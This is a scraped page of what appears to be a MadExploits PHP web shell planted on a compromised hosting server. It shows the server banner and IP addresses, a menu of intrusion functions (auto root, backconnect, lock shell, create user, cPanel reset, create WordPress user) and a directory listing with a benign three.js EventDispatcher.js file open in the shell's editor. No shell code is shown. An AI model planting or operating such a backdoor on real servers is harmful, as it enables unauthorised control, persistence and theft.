Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.133.145.155
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
HRD-Test /
src /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
BufferAttribute.js
10.24
KB
-rw-r--r--
BufferGeometry.js
20.29
KB
-rw-r--r--
Clock.js
890
B
-rw-r--r--
EventDispatcher.js
1.44
KB
-rw-r--r--
GLBufferAttribute.js
725
B
-rw-r--r--
InstancedBufferAttribute.js
631
B
-rw-r--r--
InstancedBufferGeometry.js
562
B
-rw-r--r--
InstancedInterleavedBuffer.js
747
B
-rw-r--r--
InterleavedBuffer.js
2.33
KB
-rw-r--r--
InterleavedBufferAttribute.js
5.72
KB
-rw-r--r--
Layers.js
577
B
-rw-r--r--
Object3D.js
17.36
KB
-rw-r--r--
Raycaster.js
2.18
KB
-rw-r--r--
RenderTarget.js
3.31
KB
-rw-r--r--
Uniform.js
199
B
-rw-r--r--
UniformsGroup.js
1.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : EventDispatcher.js
/** * https://github.com/mrdoob/eventdispatcher.js/ */ class EventDispatcher { addEventListener( type, listener ) { if ( this._listeners === undefined ) this._listeners = {}; const listeners = this._listeners; if ( listeners[ type ] === undefined ) { listeners[ type ] = []; } if ( listeners[ type ].indexOf( listener ) === - 1 ) { listeners[ type ].push( listener ); } } hasEventListener( type, listener ) { if ( this._listeners === undefined ) return false; const listeners = this._listeners; return listeners[ type ] !== undefined && listeners[ type ].indexOf( listener ) !== - 1; } removeEventListener( type, listener ) { if ( this._listeners === undefined ) return; const listeners = this._listeners; const listenerArray = listeners[ type ]; if ( listenerArray !== undefined ) { const index = listenerArray.indexOf( listener ); if ( index !== - 1 ) { listenerArray.splice( index, 1 ); } } } dispatchEvent( event ) { if ( this._listeners === undefined ) return; const listeners = this._listeners; const listenerArray = listeners[ event.type ]; if ( listenerArray !== undefined ) { event.target = this; // Make a copy, in case listeners are removed while iterating. const array = listenerArray.slice( 0 ); for ( let i = 0, l = array.length; i < l; i ++ ) { array[ i ].call( this, event ); } event.target = null; } } } export { EventDispatcher };
Close